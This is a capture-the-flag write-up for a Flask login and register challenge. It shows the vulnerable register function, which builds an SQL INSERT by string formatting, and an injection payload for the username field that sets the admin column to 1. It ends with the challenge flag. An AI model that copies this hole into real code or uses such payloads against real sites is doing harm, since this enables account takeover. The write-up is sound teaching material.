~# cat Question

So i think this site is pretty unbreakable. The flag seems to be impossible to obtain to me, but apparently there are multiple ways to get the flag? Maybe I'm just dumb...

FILE: VeryVulnerableSite.zip

Running the instance will bring us to a website with a login and register page that requires us to input a username and password to get the flag.

From the given app.py file from unzipping VeryVulnerableSite.zip, the code of concern is the function (register). This function takes username and password inputs from a form, hashes the password using SHA-256, inserts the username, hashed password, and a default value for admin into a SQLite database, and then redirects the user to the index page with a success message. This is part of the code that is of concern.

@app.route('/register', methods=['POST'])
def register():
  username = request.form['username']
  password = request.form['password']
  phash = sha256(password.encode('utf-8')).hexdigest()
  
  conn = sqlite3.connect('database.db')
  cur = conn.cursor()
  ## Wait how do I use the question mark thing again?
  cur.execute(f"INSERT INTO users (username, password, admin) VALUES ('{username}', '{phash}', 0)")
  conn.commit()
  
  return redirect(url_for('index', message='Successfully registered!'))

Crafting the payload

[username]','[password hashed with SHA256]',1--

By injecting the password directly into the username field, it bypasses the python code's hashing process. After registering with this payload, you can log into the created account with the displayed flag.

The SQL payload was based on this line of the code.

cur.execute(f"INSERT INTO users (username, password, admin) VALUES ('{username}', '{phash}', 0)")

Flag: ACSI{a_v3ry+v8lner4b13_p4g3_w1th_55t1_7wt_5q1i}